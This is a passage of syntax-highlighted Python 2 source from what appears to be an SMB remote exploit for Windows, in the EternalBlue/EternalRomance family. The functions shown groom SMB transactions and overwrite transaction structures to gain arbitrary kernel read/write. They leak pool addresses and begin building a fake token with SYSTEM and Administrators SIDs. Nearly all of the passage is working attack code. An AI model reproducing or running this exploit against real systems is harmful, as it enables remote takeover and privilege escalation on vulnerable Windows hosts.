    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">fid</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">,</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">indata_next_trans_displacement</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_MID_OFFSET'</span><span class="p">])</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="n">recvPkt</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="n">mid</span><span class="o">=</span><span class="n">special_mid</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;HH'</span><span class="p">,</span> <span class="n">fid</span><span class="p">,</span> <span class="mi">0</span><span class="p">),</span> <span class="n">data</span><span class="o">=</span><span class="s">''</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">65538</span><span class="p">:</span>
        <span class="k">print</span> <span class="p">(</span><span class="s">'unexpected return status: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">())</span>
        <span class="k">print</span> <span class="s">'!!! Write to wrong place !!!'</span>
        <span class="k">print</span> <span class="s">'the target might be crashed'</span>
        <span class="k">return</span> <span class="bp">False</span>
    <span class="k">print</span> <span class="s">'success controlling groom transaction'</span>
    <span class="k">print</span> <span class="s">'modify trans1 struct for arbitrary read/write'</span>
    <span class="n">fmt</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_FMT'</span><span class="p">]</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">fid</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans1_addr'</span><span class="p">]),</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">indata_next_trans_displacement</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INDATA_OFFSET'</span><span class="p">])</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">special_mid</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span> <span class="o">*</span> <span class="mi">3</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans1_addr'</span><span class="p">],</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans1_addr'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">512</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans2_addr'</span><span class="p">]),</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">])</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="n">info</span><span class="p">[</span><span class="s">'trans2_mid'</span><span class="p">]</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">next_mid</span><span class="p">()</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'trans1_mid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans2_mid'</span><span class="p">]),</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'TRANS_MID_OFFSET'</span><span class="p">])</span>
    <span class="k">return</span> <span class="bp">True</span>


<span class="k">def</span> <span class="nf">exploit_fish_barrel</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">pipe_name</span><span class="p">,</span> <span class="n">info</span><span class="p">):</span>
    <span class="n">tid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">tree_connect_andx</span><span class="p">(</span><span class="s">'</span><span class="se">\\\\</span><span class="s">'</span> <span class="o">+</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_remote_host</span><span class="p">()</span> <span class="o">+</span> <span class="s">'</span><span class="se">\\</span><span class="s">'</span> <span class="o">+</span> <span class="s">'IPC$'</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">set_default_tid</span><span class="p">(</span><span class="n">tid</span><span class="p">)</span>
    <span class="n">fid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">nt_create_andx</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">pipe_name</span><span class="p">)</span>
    <span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">]</span> <span class="o">=</span> <span class="n">fid</span>
    <span class="k">if</span> <span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span> <span class="o">==</span> <span class="s">'WIN7'</span> <span class="ow">and</span> <span class="s">'arch'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">info</span><span class="p">:</span>
        <span class="n">info</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">leak_frag_size</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">fid</span><span class="p">))</span>
    <span class="k">if</span> <span class="s">'arch'</span> <span class="ow">in</span> <span class="n">info</span><span class="p">:</span>
        <span class="n">info</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">OS_ARCH_INFO</span><span class="p">[</span><span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]][</span><span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]])</span>
        <span class="n">attempt_list</span> <span class="o">=</span> <span class="p">[</span><span class="n">OS_ARCH_INFO</span><span class="p">[</span><span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]][</span><span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]]]</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">attempt_list</span> <span class="o">=</span> <span class="p">[</span>
         <span class="n">OS_ARCH_INFO</span><span class="p">[</span><span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]][</span><span class="s">'x64'</span><span class="p">],</span> <span class="n">OS_ARCH_INFO</span><span class="p">[</span><span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]][</span><span class="s">'x86'</span><span class="p">]]</span>
    <span class="k">print</span> <span class="s">'Groom packets'</span>
    <span class="n">trans_param</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;HH'</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">12</span><span class="p">):</span>
        <span class="n">mid</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">]</span> <span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="mi">8</span> <span class="k">else</span> <span class="n">next_extra_mid</span><span class="p">()</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">send_trans</span><span class="p">(</span><span class="s">''</span><span class="p">,</span> <span class="n">mid</span><span class="o">=</span><span class="n">mid</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="n">trans_param</span><span class="p">,</span> <span class="n">totalParameterCount</span><span class="o">=</span><span class="mi">256</span> <span class="o">-</span> <span class="n">TRANS_NAME_LEN</span><span class="p">,</span> <span class="n">totalDataCount</span><span class="o">=</span><span class="mi">3776</span><span class="p">,</span> <span class="n">maxParameterCount</span><span class="o">=</span><span class="mi">64</span><span class="p">,</span> <span class="n">maxDataCount</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>

    <span class="n">shift_indata_byte</span> <span class="o">=</span> <span class="mi">512</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">do_write_andx_raw_pipe</span><span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="s">'A'</span> <span class="o">*</span> <span class="n">shift_indata_byte</span><span class="p">)</span>
    <span class="n">success</span> <span class="o">=</span> <span class="bp">False</span>
    <span class="k">for</span> <span class="n">tinfo</span> <span class="ow">in</span> <span class="n">attempt_list</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'attempt controlling next transaction on '</span> <span class="o">+</span> <span class="n">tinfo</span><span class="p">[</span><span class="s">'ARCH'</span><span class="p">]</span>
        <span class="n">HEAP_CHUNK_PAD_SIZE</span> <span class="o">=</span> <span class="p">(</span><span class="n">tinfo</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">]</span> <span class="o">-</span> <span class="p">(</span><span class="n">tinfo</span><span class="p">[</span><span class="s">'TRANS_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="n">HEAP_HDR_SIZE</span><span class="p">)</span> <span class="o">%</span> <span class="n">tinfo</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">])</span> <span class="o">%</span> <span class="n">tinfo</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">]</span>
        <span class="n">NEXT_TRANS_OFFSET</span> <span class="o">=</span> <span class="mi">3840</span> <span class="o">-</span> <span class="n">shift_indata_byte</span> <span class="o">+</span> <span class="n">HEAP_CHUNK_PAD_SIZE</span> <span class="o">+</span> <span class="n">HEAP_HDR_SIZE</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">send_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">,</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">NEXT_TRANS_OFFSET</span> <span class="o">+</span> <span class="n">tinfo</span><span class="p">[</span><span class="s">'TRANS_MID_OFFSET'</span><span class="p">])</span>
        <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
        <span class="n">recvPkt</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="n">mid</span><span class="o">=</span><span class="n">special_mid</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="n">trans_param</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="s">''</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">()</span> <span class="o">==</span> <span class="mi">65538</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">'success controlling one transaction'</span>
            <span class="n">success</span> <span class="o">=</span> <span class="bp">True</span>
            <span class="k">if</span> <span class="s">'arch'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">info</span><span class="p">:</span>
                <span class="k">print</span> <span class="s">'Target is '</span> <span class="o">+</span> <span class="n">tinfo</span><span class="p">[</span><span class="s">'ARCH'</span><span class="p">]</span>
                <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tinfo</span><span class="p">[</span><span class="s">'ARCH'</span><span class="p">]</span>
                <span class="n">info</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">OS_ARCH_INFO</span><span class="p">[</span><span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]][</span><span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]])</span>
            <span class="k">break</span>
        <span class="k">if</span> <span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
            <span class="k">print</span> <span class="p">(</span><span class="s">'unexpected return status: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">())</span>

    <span class="k">if</span> <span class="ow">not</span> <span class="n">success</span><span class="p">:</span>
        <span class="k">print</span> <span class="p">(</span><span class="s">'unexpected return status: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">())</span>
        <span class="k">print</span> <span class="s">'!!! Write to wrong place !!!'</span>
        <span class="k">print</span> <span class="s">'the target might be crashed'</span>
        <span class="k">return</span> <span class="bp">False</span>
    <span class="k">print</span> <span class="s">'modify parameter count to 0xffffffff to be able to write backward'</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="s">'</span><span class="se">\xff\xff\xff\xff</span><span class="s">'</span><span class="p">,</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">NEXT_TRANS_OFFSET</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_TOTALPARAMCNT_OFFSET'</span><span class="p">])</span>
    <span class="k">if</span> <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]</span> <span class="o">==</span> <span class="s">'x64'</span><span class="p">:</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">send_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="s">'</span><span class="se">\xff\xff\xff\xff</span><span class="s">'</span><span class="p">,</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">NEXT_TRANS_OFFSET</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4</span><span class="p">)</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="n">TRANS_CHUNK_SIZE</span> <span class="o">=</span> <span class="n">HEAP_HDR_SIZE</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4096</span> <span class="o">+</span> <span class="n">HEAP_CHUNK_PAD_SIZE</span>
    <span class="n">PREV_TRANS_DISPLACEMENT</span> <span class="o">=</span> <span class="n">TRANS_CHUNK_SIZE</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="n">TRANS_NAME_LEN</span>
    <span class="n">PREV_TRANS_OFFSET</span> <span class="o">=</span> <span class="il">4294967296L</span> <span class="o">-</span> <span class="n">PREV_TRANS_DISPLACEMENT</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">special_mid</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="s">'</span><span class="se">\xff\xff\xff\xff</span><span class="s">'</span><span class="p">,</span> <span class="n">paramDisplacement</span><span class="o">=</span><span class="n">PREV_TRANS_OFFSET</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_TOTALPARAMCNT_OFFSET'</span><span class="p">])</span>
    <span class="k">if</span> <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]</span> <span class="o">==</span> <span class="s">'x64'</span><span class="p">:</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">special_mid</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="s">'</span><span class="se">\xff\xff\xff\xff</span><span class="s">'</span><span class="p">,</span> <span class="n">paramDisplacement</span><span class="o">=</span><span class="n">PREV_TRANS_OFFSET</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4</span><span class="p">)</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">send_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="s">'</span><span class="se">\x00\x00\x00\x00</span><span class="s">'</span><span class="p">,</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">NEXT_TRANS_OFFSET</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4</span><span class="p">)</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="k">print</span> <span class="s">'leak next transaction'</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="s">'</span><span class="se">\x05</span><span class="s">'</span><span class="p">,</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">NEXT_TRANS_OFFSET</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_FUNCTION_OFFSET'</span><span class="p">])</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIIII'</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">256</span><span class="p">,</span> <span class="mi">256</span><span class="p">),</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">NEXT_TRANS_OFFSET</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_PARAMCNT_OFFSET'</span><span class="p">])</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">special_mid</span><span class="p">)</span>
    <span class="n">leakData</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">recv_transaction_data</span><span class="p">(</span><span class="n">special_mid</span><span class="p">,</span> <span class="mi">256</span><span class="p">)</span>
    <span class="n">leakData</span> <span class="o">=</span> <span class="n">leakData</span><span class="p">[</span><span class="mi">4</span><span class="p">:]</span>
    <span class="k">if</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">leakData</span><span class="p">,</span> <span class="n">HEAP_CHUNK_PAD_SIZE</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="n">TRANS_CHUNK_SIZE</span> <span class="o">//</span> <span class="n">info</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">]:</span>
        <span class="k">print</span> <span class="s">'chunk size is wrong'</span>
        <span class="k">return</span> <span class="bp">False</span>
    <span class="n">leakTranOffset</span> <span class="o">=</span> <span class="n">HEAP_CHUNK_PAD_SIZE</span> <span class="o">+</span> <span class="n">HEAP_HDR_SIZE</span>
    <span class="n">leakTrans</span> <span class="o">=</span> <span class="n">leakData</span><span class="p">[</span><span class="n">leakTranOffset</span><span class="p">:]</span>
    <span class="n">fmt</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_FMT'</span><span class="p">]</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">connection_addr</span><span class="p">,</span> <span class="n">session_addr</span><span class="p">,</span> <span class="n">treeconnect_addr</span><span class="p">,</span> <span class="n">flink_value</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span> <span class="o">*</span> <span class="mi">5</span><span class="p">,</span> <span class="n">leakTrans</span><span class="p">,</span> <span class="mi">8</span><span class="p">)</span>
    <span class="n">inparam_value</span><span class="p">,</span> <span class="n">outparam_value</span><span class="p">,</span> <span class="n">indata_value</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span> <span class="o">*</span> <span class="mi">3</span><span class="p">,</span> <span class="n">leakTrans</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">])</span>
    <span class="n">trans2_mid</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">leakTrans</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_MID_OFFSET'</span><span class="p">])[</span><span class="mi">0</span><span class="p">]</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'CONNECTION: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">connection_addr</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'SESSION: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">session_addr</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'FLINK: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">flink_value</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'InData: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">indata_value</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'MID: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">trans2_mid</span><span class="p">)</span>
    <span class="n">trans2_addr</span> <span class="o">=</span> <span class="n">inparam_value</span> <span class="o">-</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_SIZE'</span><span class="p">]</span> <span class="o">-</span> <span class="n">TRANS_NAME_LEN</span>
    <span class="n">trans1_addr</span> <span class="o">=</span> <span class="n">trans2_addr</span> <span class="o">-</span> <span class="n">TRANS_CHUNK_SIZE</span> <span class="o">*</span> <span class="mi">2</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'TRANS1: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">trans1_addr</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'TRANS2: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">trans2_addr</span><span class="p">)</span>
    <span class="k">print</span> <span class="s">'modify transaction struct for arbitrary read/write'</span>
    <span class="n">TRANS_OFFSET</span> <span class="o">=</span> <span class="il">4294967296L</span> <span class="o">-</span> <span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="s">'TRANS_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="n">TRANS_NAME_LEN</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="n">param</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span> <span class="o">*</span> <span class="mi">3</span><span class="p">,</span> <span class="n">trans1_addr</span><span class="p">,</span> <span class="n">trans1_addr</span> <span class="o">+</span> <span class="mi">512</span><span class="p">,</span> <span class="n">trans2_addr</span><span class="p">),</span> <span class="n">paramDisplacement</span><span class="o">=</span><span class="n">TRANS_OFFSET</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">])</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="n">trans1_mid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">next_mid</span><span class="p">()</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="n">param</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">trans1_mid</span><span class="p">),</span> <span class="n">paramDisplacement</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'TRANS_MID_OFFSET'</span><span class="p">])</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="n">info</span><span class="p">.</span><span class="n">update</span><span class="p">({</span><span class="s">'connection'</span><span class="p">:</span> <span class="n">connection_addr</span><span class="p">,</span> <span class="s">'session'</span><span class="p">:</span> <span class="n">session_addr</span><span class="p">,</span> <span class="s">'trans1_mid'</span><span class="p">:</span> <span class="n">trans1_mid</span><span class="p">,</span> <span class="s">'trans1_addr'</span><span class="p">:</span> <span class="n">trans1_addr</span><span class="p">,</span> <span class="s">'trans2_mid'</span><span class="p">:</span> <span class="n">trans2_mid</span><span class="p">,</span> <span class="s">'trans2_addr'</span><span class="p">:</span> <span class="n">trans2_addr</span><span class="p">})</span>
    <span class="k">return</span> <span class="bp">True</span>


<span class="k">def</span> <span class="nf">create_fake_SYSTEM_UserAndGroups</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">userAndGroupCount</span><span class="p">,</span> <span class="n">userAndGroupsAddr</span><span class="p">):</span>
    <span class="n">SID_SYSTEM</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BB5xBI'</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">18</span><span class="p">)</span>
    <span class="n">SID_ADMINISTRATORS</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BB5xBII'</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">544</span><span class="p">)</span>
    <span class="n">SID_AUTHENICATED_USERS</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BB5xBI'</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">11</span><span class="p">)</span>
    <span class="n">SID_EVERYONE</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;BB5xBI'</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">sids</span> <span class="o">=</span> <span class="p">[</span><span class="n">SID_SYSTEM</span><span class="p">,</span> <span class="n">SID_ADMINISTRATORS</span><span class="p">,</span> <span class="n">SID_EVERYONE</span><span class="p">,</span> <span class="n">SID_AUTHENICATED_USERS</span><span class="p">]</span>
    <span class="n">attrs</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">7</span><span class="p">]</span>
    <span class="n">fakeUserAndGroupCount</span> <span class="o">=</span> <span class="nb">min</span><span class="p">(</span><span class="n">userAndGroupCount</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span>
    <span class="n">fakeUserAndGroupsAddr</span> <span class="o">=</span> <span class="n">userAndGroupsAddr</span>
    <span class="n">addr</span> <span class="o">=</span> <span class="n">fakeUserAndGroupsAddr</span> <span class="o">+</span> <span class="n">fakeUserAndGroupCount</span> <span class="o">*</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_SIZE'</span><span class="p">]</span> <span class="o">*</span> <span class="mi">2</span>
    <span class="n">fakeUserAndGroups</span> <span class="o">=</span> <span class="s">''</span>
    <span class="k">for</span> <span class="n">sid</span><span class="p">,</span> <span class="n">attr</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">sids</span><span class="p">[:</span><span class="n">fakeUserAndGroupCount</span><span class="p">],</span> <span class="n">attrs</span><span class="p">[:</span><span class="n">fakeUserAndGroupCount</span><span class="p">]):</span>
